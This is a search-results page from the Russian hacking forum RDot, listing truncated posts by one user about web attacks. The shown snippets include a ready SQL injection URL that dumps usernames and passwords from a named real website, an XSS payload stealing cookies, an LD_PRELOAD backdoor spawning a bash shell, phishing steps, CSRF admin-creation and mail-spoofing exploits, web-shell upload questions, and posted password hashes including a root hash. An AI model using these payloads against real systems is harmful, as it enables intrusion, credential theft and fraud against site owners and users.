Вернуться   RDot > Поиск по форуму

Показано с 1 по 25 из 54.
На поиск затрачено 0.00 сек.
Поиск: Сообщения от: life_glider
Раздел: Web-среда/Web-applications 25.04.2011, 21:38
Ответов: 3,618
Просмотров: 2,166,863
Автор life_glider
допустим включен magic_quotes_gpc как...

допустим включен magic_quotes_gpc
как проэксплуатировать на *nix?
$path=realpath("/var/www/".$_GET['var']);
if(pathinfo($path)['extension']=='css')
{
eval("one_function('".$_GET['var']."');");...
Раздел: *nix-like 25.03.2011, 22:26
Ответов: 167
Просмотров: 130,554
Автор life_glider
каким образом можно установить ограничения для...

каким образом можно установить ограничения для пользователя на потребляемые ресурсы(CPU,кол-во файлов, кол-во процессов и тд)?
Раздел: *nix-like 25.03.2011, 18:31
Ответов: 6
Просмотров: 7,154
Автор life_glider
nmap случаем не filtered пишет. если да то пакеты...

nmap случаем не filtered пишет. если да то пакеты не прошли межсетевой экран(фаервол).
Раздел: Уязвимости PHP/PHP vulnerabilities 23.03.2011, 17:24
Ответов: 9
Просмотров: 13,478
Автор life_glider
https://students.mimuw.edu.pl/~ai292615/php_head_t...

https://students.mimuw.edu.pl/~ai292615/php_head_trick.pdf
перевод

трюк с методом HEAD протоколоа HTTP в php скриптах
(проверено на php версии 5.3.5)
Adam Iwaniuk
3 марта, 2011

это статья о...
Раздел: Квесты/CTF 15.03.2011, 16:56
Ответов: 23
Просмотров: 22,513
Автор life_glider
извиняюсь за оффтоп. каким образом нужно...

извиняюсь за оффтоп.
каким образом нужно прокачивать "хакерскую догадку"?
Раздел: Целевые системы/Target systems 14.03.2011, 22:36
Ответов: 15
Просмотров: 16,346
Автор life_glider
теме перехвата функций через LD_PRELOAD мильон...

теме перехвата функций через LD_PRELOAD мильон лет. я лишь показал способ её использования.
Раздел: Целевые системы/Target systems 14.03.2011, 22:34
Ответов: 15
Просмотров: 16,346
Автор life_glider
если запустить серверное сетевое приложение с...

если запустить серверное сетевое приложение с accept с данным LD_PRELOAD. то accept будет браться изначально из нашей библиотеки. ну наша функция тупо для нужного адреса форкается и открывает баш, а...
Раздел: *nix-like 14.03.2011, 00:44
Ответов: 12
Просмотров: 9,178
Автор life_glider
если троян предполагает что его запускают из...

если троян предполагает что его запускают из вайна
то системные вызовы через int 80h на вайне работают и ничто ему не мешает из вайна выбраться
Раздел: Целевые системы/Target systems 13.03.2011, 23:18
Ответов: 15
Просмотров: 16,346
Автор life_glider
LD_PRELOAD magic. невидимый бэкдор.

работа загрузчика исполняемых файлов(ld.so, ld-linux.so в пингвине) зависит от переменных окружения в частности от LD_PRELOAD, который задаёт библиотеку из которой нужно подгружать ресурсы в первую...
Раздел: Оффтоп/Offtopic 12.01.2011, 15:25
Ответов: 102
Просмотров: 81,986
Автор life_glider
Metallica - Завод(английские слова по русски) ...

Metallica - Завод(английские слова по русски)
http://www.youtube.com/watch?v=x3nf3V054c8
Раздел: Web development 11.01.2011, 23:02
Ответов: 319
Просмотров: 234,248
Автор life_glider
Wink Регулярку без евалов и дополнительной памяти...

Регулярку без евалов и дополнительной памяти составить НЕВОЗМОЖНО
Доказательство:
как известно регулярный язык = язык распознаваемый конечным автоматом.
любой такой язык удовлетворяет лемме о...
Раздел: Web-среда/Web-applications 01.01.2011, 21:25
Ответов: 12
Просмотров: 12,319
Автор life_glider
http://www.edge-security.com/wfuzz.php использую...

http://www.edge-security.com/wfuzz.php использую данный брутфорсер для админ панелей
Раздел: Сценарии/CMF/СMS 31.12.2010, 05:17
Ответов: 17
Просмотров: 49,494
Автор life_glider
Smile CSRF(core 8.0)

Дырка в ядре(8.0)
требования:НЕТ
Подделка запросов.
код mainfile.php:
вроде есть какая-то "защита"

// Posting from other servers in not allowed
// Fix by Quake
// Bug found by PeNdEjO
Раздел: Криптография/Cryptography 11.12.2010, 13:45
Ответов: 821
Просмотров: 451,675
Автор life_glider
yamaha:cf96f6ff41af917a49fd7f8cc05fdb2a

yamaha:cf96f6ff41af917a49fd7f8cc05fdb2a
Раздел: Оффтоп/Offtopic 29.10.2010, 19:52
Ответов: 24
Просмотров: 7,872
Автор life_glider
если не были они в Аполлоне-11 то точно были в...

если не были они в Аполлоне-11 то точно были в последующих разах.
12 человек судя по педевикии...
Раздел: Криптография/Cryptography 05.10.2010, 21:19
Ответов: 919
Просмотров: 515,430
Автор life_glider
рускоязычный ...

рускоязычный
root:$1$n2x0bb2z$IQEdbeVgeSmvdDV1OBk1N1:14172:0:::::
Раздел: Web-среда/Web-applications 02.10.2010, 18:07
Ответов: 290
Просмотров: 192,913
Автор life_glider
http://www.pesl.net/product.php?id=-1%20union%20se...

http://www.pesl.net/product.php?id=-1%20union%20select%201,2,3,4,group_concat%28user_id,0x3a,user_pass,0x3b3b%29,6,7,8,9,10,11,12,13,14,15,16%20from%20users&cat=5&subcat=7
...
Раздел: Статьи/Articles 29.09.2010, 22:10
Ответов: 16
Просмотров: 15,374
Автор life_glider
а если есть фильтр тэгов по блэклисту. и...

а если есть фильтр тэгов по блэклисту. и форма,ифрэме и тд не лезет? допустим только ссылка и картинка со стилями.
Раздел: Сценарии/CMF/СMS 28.09.2010, 19:16
Ответов: 0
Просмотров: 2,870
Автор life_glider
Уязвимости dfeiew

в китайском полный ноль
модераторы, не сносите, время появится доведу до ума
site:dfeiew.googlecode.com
уязвимость:sql-injection
зависисмости: никаких
file:news.php
$nid=$_GET["nid"];
if...
Раздел: Сценарии/CMF/СMS 28.09.2010, 17:27
Ответов: 2
Просмотров: 5,899
Автор life_glider
1)version:0.3 тип:pxss exploit: ...

1)version:0.3
тип:pxss
exploit:
http://localhost/search/index/1%3Ciframe%20src=%27javascript:alert%28document.cookie+%22%5Cx2f%22%29;%27%3E


2)
не пробовал, но теоретически должно работать...
Раздел: Web-среда/Web-applications 28.09.2010, 16:19
Ответов: 3,618
Просмотров: 2,166,863
Автор life_glider
подскажите есть возможность залить .htaccess файл...

подскажите есть возможность залить .htaccess файл и любой файл не удовлетворяющий блэклисту. как залить шелл?



при таком он говорит что вы качаете файл типа php сценарий.
Раздел: Статьи/Articles 27.09.2010, 01:16
Ответов: 16
Просмотров: 15,374
Автор life_glider
Talking как можно успешно проводить фишинг атаку: ...

как можно успешно проводить фишинг атаку:
1)создаём скриншот сервиса. сохраняем картинкой(как вариает суём в письмо)
2)создаём html

<a href="http://vokantagte.com">
<div...
Раздел: Статьи/Articles 19.09.2010, 23:21
Ответов: 25
Просмотров: 39,998
Автор life_glider
насколько я понимаю csrf-токен не помеха. а если...

насколько я понимаю csrf-токен не помеха. а если есть автозаполнение форм с паролем-подтверждением админа?
Раздел: Сценарии/CMF/СMS 19.09.2010, 22:47
Ответов: 2
Просмотров: 3,760
Автор life_glider
тип:CSRF(добавление нового админа-юзера) ...

тип:CSRF(добавление нового админа-юзера)
файл:register.php
if (isset($_POST['submitted'])) //validating the form
{
include('scripts/db_connect_select.php');
db_connect_select();
$obj...
Раздел: Web-среда/Web-applications 17.09.2010, 19:55
Ответов: 10
Просмотров: 12,178
Автор life_glider
Mail.ru - можно подделать отправку любого письма...

Mail.ru - можно подделать отправку любого письма на любой адрес(get - запрос)
<html>
<head>
</head>
<body>
<img...
Показано с 1 по 25 из 54.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot